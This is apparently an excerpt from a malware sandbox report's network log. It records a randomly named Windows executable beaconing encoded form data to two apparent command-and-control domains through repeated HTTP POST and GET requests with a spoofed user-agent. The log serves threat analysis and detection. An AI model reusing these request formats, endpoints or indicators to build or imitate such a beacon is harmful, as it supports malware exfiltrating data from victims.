                                                                    10192.168.2.449969134.122.133.80801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:28.922775984 CET748OUTPOST /a59t/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.44756.pizza
                                                                    Origin: http://www.44756.pizza
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.44756.pizza/a59t/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 37 57 78 44 6f 47 34 59 35 51 62 5a 52 77 67 4d 31 6d 47 65 6a 4a 54 63 38 53 56 2f 45 62 58 4b 4d 67 70 35 4c 30 70 68 4a 43 54 70 2f 75 67 42 79 62 6f 51 6c 56 70 56 48 72 76 52 48 68 37 42 59 46 78 6e 4a 56 58 63 42 35 48 79 67 4d 62 75 4e 6f 39 63 4f 63 63 73 42 47 68 47 48 31 47 31 46 53 50 4f 4c 37 56 68 76 7a 36 64 45 61 58 55 70 6c 4a 46 4d 75 4a 68 6d 51 2f 7a 71 6c 66 58 37 56 64 6e 6b 49 4d 6c 76 6a 4b 6c 49 7a 68 2b 56 52 75 2f 53 54 65 61 4f 79 63 71 30 43 4e 44 31 68 50 66 47 57 6f 62 6d 65 62 6d 50 59 3d
                                                                    Data Ascii: 1V=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO7WxDoG4Y5QbZRwgM1mGejJTc8SV/EbXKMgp5L0phJCTp/ugByboQlVpVHrvRHh7BYFxnJVXcB5HygMbuNo9cOccsBGhGH1G1FSPOL7Vhvz6dEaXUplJFMuJhmQ/zqlfX7VdnkIMlvjKlIzh+VRu/STeaOycq0CND1hPfGWobmebmPY=
                                                                    Jan 3, 2025 11:40:29.785847902 CET312INHTTP/1.1 404 Not Found
                                                                    Content-Length: 148
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:40:29 GMT
                                                                    Etag: "6743f11f-94"
                                                                    Server: nginx
                                                                    Connection: close
                                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.449988134.122.133.80801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:31.470673084 CET10830OUTPOST /a59t/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.44756.pizza
                                                                    Origin: http://www.44756.pizza
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.44756.pizza/a59t/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 36 75 78 41 61 4f 34 5a 65 38 62 61 52 77 67 43 56 6d 4c 65 6a 4a 61 63 2f 69 5a 2f 45 57 67 4b 50 59 70 34 6f 38 70 6e 34 43 54 69 2f 75 67 65 69 62 74 61 46 56 5a 56 48 37 6a 52 48 78 37 42 59 46 78 6e 50 35 58 4d 6a 64 48 30 67 4e 70 6d 74 6f 4c 4b 2b 63 67 73 42 65 58 47 48 42 34 31 55 79 50 4f 72 72 56 67 63 62 36 57 45 61 52 56 70 6c 72 46 4d 53 67 68 69 49 5a 7a 75 73 79 58 37 52 64 6c 51 42 55 78 39 76 67 34 35 54 74 38 46 67 4d 2b 44 48 54 58 38 33 38 6d 58 37 58 65 58 78 55 5a 57 44 2b 44 45 6a 52 39 35 35 74 34 55 38 41 6a 51 5a 2f 4e 73 62 56 73 4f 53 62 44 4a 73 6d 2b 45 56 56 30 50 73 35 76 2b 61 52 45 63 36 35 74 30 56 38 33 52 56 41 2f 67 58 37 70 33 4c 74 59 4e 53 6e 4d 74 63 41 72 45 50 5a 4b 4a 75 51 73 6c 65 56 57 38 33 64 5a 71 67 55 59 75 59 4d 35 71 41 76 75 68 6b 73 56 46 78 37 74 50 47 2f 58 46 68 6d 4b 52 72 72 41 75 46 55 5a 47 71 6a 66 52 30 [TRUNCATED]
                                                                    Data Ascii: 1V=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO6uxAaO4Ze8baRwgCVmLejJac/iZ/EWgKPYp4o8pn4CTi/ugeibtaFVZVH7jRHx7BYFxnP5XMjdH0gNpmtoLK+cgsBeXGHB41UyPOrrVgcb6WEaRVplrFMSghiIZzusyX7RdlQBUx9vg45Tt8FgM+DHTX838mX7XeXxUZWD+DEjR955t4U8AjQZ/NsbVsOSbDJsm+EVV0Ps5v+aREc65t0V83RVA/gX7p3LtYNSnMtcArEPZKJuQsleVW83dZqgUYuYM5qAvuhksVFx7tPG/XFhmKRrrAuFUZGqjfR0h3blGpnODQGudJQmFrHDBPy/yNj0p13GEHuUqDPMIn3TWn9wcaUykuzWXmWLPSJVQpx+E3+pLwIrsS1NLj7L+jTln2K4OthXg7LtLFLo9GOWWV2hj2VhJE5/6r9rLcsadpfXwMJorpS4vJaqJ72iST6r9iOd4XkB2lA7c0J2emZozVKsfe7cDLYQsMV4LlW07+ZxqDMg4sAFvKZgO7QPgracq4nQ8NXk35KX7D7JvlHJ6ImWPxkj8Ay9QR0lY6jfHEvK3IENh59b582Oh+C5OeeQb56L5Vg+etY+oOotcRo0p3MuAYjC7LXeE599d4uw1pAI1ajX34ED0E03Vpr4fMflsXD1m+6XbI37j6L6vcw9bIAjyGgzsVci0JD58v0Bdl7OYLhLK9VLrQdfnKY9NxNndZX+cMg3LU5lEsZS+C8yfab1Z4+q9Yc36Y8tcepnYfn+HMjfh08OGJAB5lv7DS+b7dyzZOvbz3JDc3qYa/4v82cJdNusHC2LnOhzLBUYKH+TxhW/C0LXVsCSWLosRRZEipWcLKV+HqtZLx/6TylN5VvRn8abTSD1U2nmz2HJxUL43tNHSRnLRZVzADfFB61QMdjm91FSaKB49j5/gkFQwHUMRBC2WTaKSPWLUJvlNyqEhvNfgpluN2XvTUpr5JIT6obhUgTDFX [TRUNCATED]
                                                                    Jan 3, 2025 11:40:32.361994982 CET312INHTTP/1.1 404 Not Found
                                                                    Content-Length: 148
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:40:32 GMT
                                                                    Etag: "6743f11f-94"
                                                                    Server: nginx
                                                                    Connection: close
                                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.450004134.122.133.80801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:34.012120962 CET466OUTGET /a59t/?1V=4xL6Q7DrxWj99jxey6XhnD59kXlzpzVjNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acuv+yDBW+TCFZeEjgS2d8Hc9PwvsiMDAZ0mc=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.44756.pizza
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:40:34.898797035 CET312INHTTP/1.1 404 Not Found
                                                                    Content-Length: 148
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:40:34 GMT
                                                                    Etag: "6743f11f-94"
                                                                    Server: nginx
                                                                    Connection: close
                                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.450015199.192.21.169801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:39.979723930 CET737OUTPOST /bowc/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.lonfor.website
                                                                    Origin: http://www.lonfor.website
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.lonfor.website/bowc/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 32 52 33 7a 4d 6c 6e 6a 59 46 6c 72 4e 75 54 7a 59 4d 4b 68 71 66 4e 4a 46 46 6b 31 4c 56 54 47 68 48 6c 55 68 56 59 35 77 31 41 51 65 59 78 38 35 57 4f 49 78 4d 4e 43 4e 64 6f 36 35 61 59 6d 52 6f 47 6a 73 44 6d 38 4d 56 30 63 63 58 43 5a 4e 4d 65 77 2f 41 58 4d 4e 53 78 42 66 67 61 74 50 34 75 50 54 59 47 7a 38 49 6e 69 4c 41 70 48 31 4d 6f 68 73 58 61 49 68 42 61 4b 4a 46 59 2f 6c 59 4f 36 4c 65 62 44 78 77 34 7a 30 6d 45 48 69 73 41 4f 37 37 77 51 48 6a 62 58 78 5a 47 65 76 50 65 2b 41 57 30 6d 62 48 71 72 67 77 53 57 45 48 36 66 51 3d 3d
                                                                    Data Ascii: 1V=sQtSC1b/Ma16y2R3zMlnjYFlrNuTzYMKhqfNJFFk1LVTGhHlUhVY5w1AQeYx85WOIxMNCNdo65aYmRoGjsDm8MV0ccXCZNMew/AXMNSxBfgatP4uPTYGz8IniLApH1MohsXaIhBaKJFY/lYO6LebDxw4z0mEHisAO77wQHjbXxZGevPe+AW0mbHqrgwSWEH6fQ==
                                                                    Jan 3, 2025 11:40:40.572974920 CET918INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:40 GMT
                                                                    Server: Apache
                                                                    Content-Length: 774
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.450016199.192.21.169801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:42.533444881 CET757OUTPOST /bowc/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.lonfor.website
                                                                    Origin: http://www.lonfor.website
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.lonfor.website/bowc/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 78 54 48 41 33 6c 56 6c 68 59 30 51 31 41 46 75 59 77 2f 4a 57 2f 49 78 41 46 43 4d 68 6f 36 39 79 59 6d 51 59 47 69 62 2f 6c 39 63 56 79 4a 4d 58 41 58 74 4d 65 77 2f 41 58 4d 4a 44 35 42 66 34 61 74 2b 49 75 4f 78 38 4a 74 73 49 6b 6c 4c 41 70 57 6c 4d 73 68 73 58 34 49 6b 5a 67 4b 4d 42 59 2f 6e 41 4f 36 5a 32 61 4a 78 77 69 39 55 6e 6f 42 69 34 45 41 4b 61 50 58 42 72 48 49 79 4e 78 62 70 43 45 76 78 33 6a 30 62 6a 5a 32 6e 35 6d 62 48 36 7a 45 58 6c 4a 47 4d 59 2b 6b 48 33 76 4e 49 31 34 4f 6f 6e 6d 53 42 30 3d
                                                                    Data Ascii: 1V=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10ppxTHA3lVlhY0Q1AFuYw/JW/IxAFCMho69yYmQYGib/l9cVyJMXAXtMew/AXMJD5Bf4at+IuOx8JtsIklLApWlMshsX4IkZgKMBY/nAO6Z2aJxwi9UnoBi4EAKaPXBrHIyNxbpCEvx3j0bjZ2n5mbH6zEXlJGMY+kH3vNI14OonmSB0=
                                                                    Jan 3, 2025 11:40:43.112173080 CET918INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:43 GMT
                                                                    Server: Apache
                                                                    Content-Length: 774
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.450017199.192.21.169801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:45.086481094 CET10839OUTPOST /bowc/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.lonfor.website
                                                                    Origin: http://www.lonfor.website
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.lonfor.website/bowc/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 35 54 47 79 50 6c 56 43 39 59 31 51 31 41 5a 2b 59 31 2f 4a 57 69 49 31 73 42 43 4d 74 53 36 37 32 59 33 43 67 47 6c 71 2f 6c 6b 73 56 79 52 38 58 46 5a 4e 4d 78 77 2b 73 4c 4d 4e 6e 35 42 66 34 61 74 38 51 75 4e 6a 59 4a 76 73 49 6e 69 4c 41 62 48 31 4d 55 68 73 76 43 49 6b 74 77 4b 59 31 59 2f 48 51 4f 35 71 65 61 54 78 77 6b 36 55 6e 77 42 69 6c 61 41 4b 58 38 58 42 33 39 49 7a 31 78 62 74 72 77 78 67 37 30 67 4b 33 77 69 47 52 34 54 47 61 4b 4c 56 56 4f 47 4d 6b 64 79 47 6e 73 41 49 49 64 62 71 4f 69 46 30 55 76 53 2f 77 77 31 61 42 64 4b 4c 75 51 62 50 55 66 4d 68 68 6e 2f 70 59 56 43 56 79 69 51 6c 31 55 78 6d 58 4b 79 58 69 56 6e 6d 79 6b 44 4a 62 44 4c 32 43 46 44 4a 74 6e 6b 55 6f 34 58 32 79 4d 68 72 47 4c 34 4a 54 48 34 4e 58 4c 51 44 31 68 76 46 79 39 37 2b 58 49 74 67 53 53 70 5a 65 67 73 79 70 68 67 50 46 53 5a 68 50 78 67 30 59 46 47 61 43 62 35 67 7a [TRUNCATED]
                                                                    Data Ascii: 1V=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10pp5TGyPlVC9Y1Q1AZ+Y1/JWiI1sBCMtS672Y3CgGlq/lksVyR8XFZNMxw+sLMNn5Bf4at8QuNjYJvsIniLAbH1MUhsvCIktwKY1Y/HQO5qeaTxwk6UnwBilaAKX8XB39Iz1xbtrwxg70gK3wiGR4TGaKLVVOGMkdyGnsAIIdbqOiF0UvS/ww1aBdKLuQbPUfMhhn/pYVCVyiQl1UxmXKyXiVnmykDJbDL2CFDJtnkUo4X2yMhrGL4JTH4NXLQD1hvFy97+XItgSSpZegsyphgPFSZhPxg0YFGaCb5gzalH+aNX2hbe3sc2ShpFXzVkL+qNANmVIqSebP5vkkQMUY+q8d2RagmCk4LoETyCfbFQ8IU8OQVHmNX05eFtjQVEQkmJKQsUm9i0HFoK5+nV8ExJOxHZqNV4RiQBSY0teIfWMI98QYWIg9w2IFcSy/sFzPbcCODs6S7UN+7JVdDDD0cZ5TpSJ5xThuUufuzmVehP5ETJzKs/y0t9TqIwhq58/IAhqBFQQL0R3U5bqNUsakWYAn74muHSQzDBGZ/e2WaoCj/5p630kGX+buquO08aEQyif4+LTt/aqIM82Daw8dI+z7jD532hJdDtZUC4S1DQN3+uEp78qJFLZOzLE/f85lzD5oZln/lL4LIXA+6xV58nJRqZfjGkw0Z1loHWIGMxNh0ujn7Tc3BCCRl+TTghqqg1gkFm6+X62geWV0e2z67UTbt1OIP5f9i3hB7ohMv47mkJoJWEt76C/YvOUh3Z1fbeQw2DXq1tvsPBM59zDWIyQ4B8v62LmTdrb5FGjDeztJNgJmCxNsXxYdeHVPTD3azhJNcNZA3grOox1Pt1rCcAZnAeUodAXYzby6Ou9OZsgtW7DBHEgai89Qh+JbgCYz1vwikx1EwAJKAF35t3LUCdV8h6UaVwAprZ7gs36a8VdtXkEiSEdMQ1D6kROVgcNZVCijnBjHg [TRUNCATED]
                                                                    Jan 3, 2025 11:40:45.761290073 CET918INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:45 GMT
                                                                    Server: Apache
                                                                    Content-Length: 774
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.450018199.192.21.169801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:47.630450010 CET469OUTGET /bowc/?w0DDw=KH0hz6&1V=hSFyBF7QNpd6wUow9uUe+oJ47NX8i/8WjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+/1bJOK8Z/4V5qgzDPWvLYQmptlMfzF+8/0= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.lonfor.website
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:40:48.229320049 CET933INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:48 GMT
                                                                    Server: Apache
                                                                    Content-Length: 774
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
